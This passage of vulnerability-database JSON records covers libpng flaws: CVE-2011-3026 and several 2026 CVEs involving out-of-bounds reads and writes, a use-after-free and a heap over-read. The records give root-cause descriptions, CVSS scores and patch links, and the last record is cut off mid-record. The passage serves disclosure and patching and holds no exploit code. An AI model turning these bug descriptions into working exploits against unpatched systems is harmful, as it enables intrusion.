"url": "http://www.mozilla.org/security/announce/2012/mfsa2012-11.html"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21627992"
},
{
"trust": 0.3,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21626697"
},
{
"trust": 0.2,
"url": "http://www.ubuntu.com/usn/usn-1367-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3048"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/kb/docs/doc-11259"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/#package"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.2,
"url": "http://bugzilla.redhat.com/):"
},
{
"trust": 0.2,
"url": "https://www.redhat.com/security/data/cve/cve-2011-3026.html"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.1,
"url": "https://support.symantec.com/us/en/article.symsa1262.html"
},
{
"trust": 0.1,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=27482"
},
{
"trust": 0.1,
"url": "https://vulmon.com/vulnerabilitydetails?qid=cve-2012-6277"
},
{
"trust": 0.1,
"url": "https://www.energy.gov/cio/articles/v-118-ibm-lotus-domino-multiple-vulnerabilities"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-addressed-in-ibm-notes-9-0-cve-2011-3026-cve-2012-6349-cve-2012-6277/"
},
{
"trust": 0.1,
"url": "https://www.kb.cert.org/vuls/id/849841/"
},
{
"trust": 0.1,
"url": "https://www.tenable.com/plugins/nessus/67192"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/190.html"
},
{
"trust": 0.1,
"url": "https://github.com/argp/cve-2011-3026-firefox"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/933399"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/thunderbird/3.1.19+build1+nobinonly-0ubuntu0.10.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/thunderbird/3.1.19+build1+nobinonly-0ubuntu0.10.10.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/thunderbird/3.1.19+build1+nobinonly-0ubuntu0.11.04.1"
},
{
"trust": 0.1,
"url": "http://www.ubuntu.com/usn/usn-1367-3"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51365/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/849841"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=51365"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/51365/"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/10.0.2+build1-0ubuntu0.10.10.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/10.0.2+build1-0ubuntu0.11.10.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/10.0.2+build1-0ubuntu0.11.04.1"
},
{
"trust": 0.1,
"url": "http://www.ubuntu.com/usn/usn-1367-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/firefox/10.0.2+build1-0ubuntu0.10.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/bugs/933293"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3464"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3045"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3045"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2692"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3048"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2501"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2692"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2690"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-2691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2501"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3026"
},
{
"trust": 0.1,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-5063"
},
{
"trust": 0.1,
"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2690"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3464"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-5063"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2691"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2012-0141.html"
},
{
"trust": 0.1,
"url": "https://rhn.redhat.com/errata/rhsa-2012-0142.html"
},
{
"trust": 0.1,
"url": "https://www.apple.com/itunes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3059"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1167"
},
{
"trust": 0.1,
"url": "http://support.apple.com/kb/ht1222"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3035"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3050"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3016"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3060"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2834"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2845"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1944"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3064"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3043"
},
{
"trust": 0.1,
"url": "http://www.freetype.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3041"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3021"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3032"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3044"
},
{
"trust": 0.1,
"url": "http://gpgtools.org"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3053"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3034"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3042"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-3039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-2821"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-3026"
},
{
"trust": 0.1,
"url": "http://www.mandriva.com/security/advisories"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "PACKETSTORM",
"id": "109898"
},
{
"db": "PACKETSTORM",
"id": "118291"
},
{
"db": "PACKETSTORM",
"id": "109897"
},
{
"db": "PACKETSTORM",
"id": "114070"
},
{
"db": "PACKETSTORM",
"id": "109835"
},
{
"db": "PACKETSTORM",
"id": "109836"
},
{
"db": "PACKETSTORM",
"id": "116791"
},
{
"db": "PACKETSTORM",
"id": "110096"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#849841"
},
{
"db": "VULHUB",
"id": "VHN-59558"
},
{
"db": "VULHUB",
"id": "VHN-50971"
},
{
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"db": "BID",
"id": "52049"
},
{
"db": "PACKETSTORM",
"id": "109898"
},
{
"db": "PACKETSTORM",
"id": "118291"
},
{
"db": "PACKETSTORM",
"id": "109897"
},
{
"db": "PACKETSTORM",
"id": "114070"
},
{
"db": "PACKETSTORM",
"id": "109835"
},
{
"db": "PACKETSTORM",
"id": "109836"
},
{
"db": "PACKETSTORM",
"id": "116791"
},
{
"db": "PACKETSTORM",
"id": "110096"
},
{
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-20T00:00:00",
"db": "CERT/CC",
"id": "VU#849841"
},
{
"date": "2020-02-21T00:00:00",
"db": "VULHUB",
"id": "VHN-59558"
},
{
"date": "2012-02-16T00:00:00",
"db": "VULHUB",
"id": "VHN-50971"
},
{
"date": "2012-02-16T00:00:00",
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"date": "2012-02-15T00:00:00",
"db": "BID",
"id": "52049"
},
{
"date": "2012-02-18T03:05:35",
"db": "PACKETSTORM",
"id": "109898"
},
{
"date": "2012-11-23T08:19:51",
"db": "PACKETSTORM",
"id": "118291"
},
{
"date": "2012-02-18T03:05:23",
"db": "PACKETSTORM",
"id": "109897"
},
{
"date": "2012-06-22T20:23:59",
"db": "PACKETSTORM",
"id": "114070"
},
{
"date": "2012-02-17T02:34:07",
"db": "PACKETSTORM",
"id": "109835"
},
{
"date": "2012-02-17T02:34:24",
"db": "PACKETSTORM",
"id": "109836"
},
{
"date": "2012-09-22T06:24:25",
"db": "PACKETSTORM",
"id": "116791"
},
{
"date": "2012-02-23T05:06:20",
"db": "PACKETSTORM",
"id": "110096"
},
{
"date": "2012-02-16T20:55:04.083000",
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-28T00:00:00",
"db": "CERT/CC",
"id": "VU#849841"
},
{
"date": "2020-03-04T00:00:00",
"db": "VULHUB",
"id": "VHN-59558"
},
{
"date": "2020-04-16T00:00:00",
"db": "VULHUB",
"id": "VHN-50971"
},
{
"date": "2020-04-16T00:00:00",
"db": "VULMON",
"id": "CVE-2011-3026"
},
{
"date": "2015-04-13T21:51:00",
"db": "BID",
"id": "52049"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-3026"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "52049"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Autonomy Keyview IDOL contains multiple vulnerabilities in file parsers",
"sources": [
{
"db": "CERT/CC",
"id": "VU#849841"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Boundary Condition Error",
"sources": [
{
"db": "BID",
"id": "52049"
}
],
"trust": 0.3
}
}
CVE-2026-33636 (GCVE-0-2026-33636)
Vulnerability from nvd – Published: 2026-03-26 16:51 – Updated: 2026-03-26 18:45
VLAI?
Title
LIBPNG has ARM NEON Palette Expansion Out-of-Bounds Read on AArch64
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.36 through 1.6.55, an out-of-bounds read and write exists in libpng's ARM/AArch64 Neon-optimized palette expansion path. When expanding 8-bit paletted rows to RGB or RGBA, the Neon loop processes a final partial chunk without verifying that enough input pixels remain. Because the implementation works backward from the end of the row, the final iteration dereferences pointers before the start of the row buffer (OOB read) and writes expanded pixel data to the same underflowed positions (OOB write). This is reachable via normal decoding of attacker-controlled PNG input if Neon is enabled. Version 1.6.56 fixes the issue.
Severity ?
7.6 (High)
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33636",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-26T18:45:14.491475Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T18:45:26.631Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.6.36, \u003c 1.6.56"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.6.36 through 1.6.55, an out-of-bounds read and write exists in libpng\u0027s ARM/AArch64 Neon-optimized palette expansion path. When expanding 8-bit paletted rows to RGB or RGBA, the Neon loop processes a final partial chunk without verifying that enough input pixels remain. Because the implementation works backward from the end of the row, the final iteration dereferences pointers before the start of the row buffer (OOB read) and writes expanded pixel data to the same underflowed positions (OOB write). This is reachable via normal decoding of attacker-controlled PNG input if Neon is enabled. Version 1.6.56 fixes the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125: Out-of-bounds Read",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T16:51:58.289Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-wjr5-c57x-95m2",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-wjr5-c57x-95m2"
},
{
"name": "https://github.com/pnggroup/libpng/commit/7734cda20cf1236aef60f3bbd2267c97bbb40869",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/7734cda20cf1236aef60f3bbd2267c97bbb40869"
},
{
"name": "https://github.com/pnggroup/libpng/commit/aba9f18eba870d14fb52c5ba5d73451349e339c3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/aba9f18eba870d14fb52c5ba5d73451349e339c3"
}
],
"source": {
"advisory": "GHSA-wjr5-c57x-95m2",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has ARM NEON Palette Expansion Out-of-Bounds Read on AArch64"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33636",
"datePublished": "2026-03-26T16:51:58.289Z",
"dateReserved": "2026-03-23T14:24:11.619Z",
"dateUpdated": "2026-03-26T18:45:26.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-33416 (GCVE-0-2026-33416)
Vulnerability from nvd – Published: 2026-03-26 16:48 – Updated: 2026-04-01 03:55
VLAI?
Title
LIBPNG has use-after-free via pointer aliasing in `png_set_tRNS` and `png_set_PLTE`
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.2.1 through 1.6.55, `png_set_tRNS` and `png_set_PLTE` each alias a heap-allocated buffer between `png_struct` and `png_info`, sharing a single allocation across two structs with independent lifetimes. The `trans_alpha` aliasing has been present since at least libpng 1.0, and the `palette` aliasing since at least 1.2.1. Both affect all prior release lines `png_set_tRNS` sets `png_ptr->trans_alpha = info_ptr->trans_alpha` (256-byte buffer) and `png_set_PLTE` sets `info_ptr->palette = png_ptr->palette` (768-byte buffer). In both cases, calling `png_free_data` (with `PNG_FREE_TRNS` or `PNG_FREE_PLTE`) frees the buffer through `info_ptr` while the corresponding `png_ptr` pointer remains dangling. Subsequent row-transform functions dereference and, in some code paths, write to the freed memory. A second call to `png_set_tRNS` or `png_set_PLTE` has the same effect, because both functions call `png_free_data` internally before reallocating the `info_ptr` buffer. Version 1.6.56 fixes the issue.
Severity ?
7.5 (High)
CWE
- CWE-416 - Use After Free
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33416",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-31T00:00:00+00:00",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T03:55:17.603Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.2.1, \u003c 1.6.56"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.2.1 through 1.6.55, `png_set_tRNS` and `png_set_PLTE` each alias a heap-allocated buffer between `png_struct` and `png_info`, sharing a single allocation across two structs with independent lifetimes. The `trans_alpha` aliasing has been present since at least libpng 1.0, and the `palette` aliasing since at least 1.2.1. Both affect all prior release lines `png_set_tRNS` sets `png_ptr-\u003etrans_alpha = info_ptr-\u003etrans_alpha` (256-byte buffer) and `png_set_PLTE` sets `info_ptr-\u003epalette = png_ptr-\u003epalette` (768-byte buffer). In both cases, calling `png_free_data` (with `PNG_FREE_TRNS` or `PNG_FREE_PLTE`) frees the buffer through `info_ptr` while the corresponding `png_ptr` pointer remains dangling. Subsequent row-transform functions dereference and, in some code paths, write to the freed memory. A second call to `png_set_tRNS` or `png_set_PLTE` has the same effect, because both functions call `png_free_data` internally before reallocating the `info_ptr` buffer. Version 1.6.56 fixes the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416: Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-26T16:48:54.174Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-m4pc-p4q3-4c7j",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-m4pc-p4q3-4c7j"
},
{
"name": "https://github.com/pnggroup/libpng/pull/824",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/pull/824"
},
{
"name": "https://github.com/pnggroup/libpng/commit/23019269764e35ed8458e517f1897bd3c54820eb",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/23019269764e35ed8458e517f1897bd3c54820eb"
},
{
"name": "https://github.com/pnggroup/libpng/commit/7ea9eea884a2328cc7fdcb3c0c00246a50d90667",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/7ea9eea884a2328cc7fdcb3c0c00246a50d90667"
},
{
"name": "https://github.com/pnggroup/libpng/commit/a3a21443ed12bfa1ef46fa0d4fb2b74a0fa34a25",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/a3a21443ed12bfa1ef46fa0d4fb2b74a0fa34a25"
},
{
"name": "https://github.com/pnggroup/libpng/commit/c1b0318b393c90679e6fa5bc1d329fd5d5012ec1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/c1b0318b393c90679e6fa5bc1d329fd5d5012ec1"
}
],
"source": {
"advisory": "GHSA-m4pc-p4q3-4c7j",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has use-after-free via pointer aliasing in `png_set_tRNS` and `png_set_PLTE`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33416",
"datePublished": "2026-03-26T16:48:54.174Z",
"dateReserved": "2026-03-19T17:02:34.172Z",
"dateUpdated": "2026-04-01T03:55:17.603Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-25646 (GCVE-0-2026-25646)
Vulnerability from nvd – Published: 2026-02-10 17:04 – Updated: 2026-02-11 15:31
VLAI?
Title
LIBPNG has a heap buffer overflow in png_set_quantize
Summary
LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user's display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification. This vulnerability is fixed in 1.6.55.
Severity ?
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2026-02-10T17:25:31.583Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2026/02/09/7"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-25646",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-02-11T15:31:50.552532Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-11T15:31:58.665Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "libpng",
"vendor": "pnggroup",
"versions": [
{
"status": "affected",
"version": "\u003c 1.6.55"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user\u0027s display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification. This vulnerability is fixed in 1.6.55."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "HIGH",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-122",
"description": "CWE-122: Heap-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-126",
"description": "CWE-126: Buffer Over-read",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-02-10T17:04:38.501Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3"
},
{
"name": "https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88"
}
],
"source": {
"advisory": "GHSA-g8hp-mq4h-rqm3",
"discovery": "UNKNOWN"
},
"title": "LIBPNG has a heap buffer overflow in png_set_quantize"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-25646",
"datePublished": "2026-02-10T17:04:38.501Z",
"dateReserved": "2026-02-04T05:15:41.791Z",
"dateUpdated": "2026-02-11T15:31:58.665Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-28164 (GCVE-0-2025-28164)
Vulnerability from nvd – Published: 2026-01-27 00:00 – Updated: 2026-01-28 16:35
VLAI?
Summary
Buffer Overflow vulnerability in libpng 1.6.43-1.6.46 allows a local attacker to cause a denial of service via png_create_read_struct() function.
Severity ?
5.5 (Medium)
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-28164",
"options": [
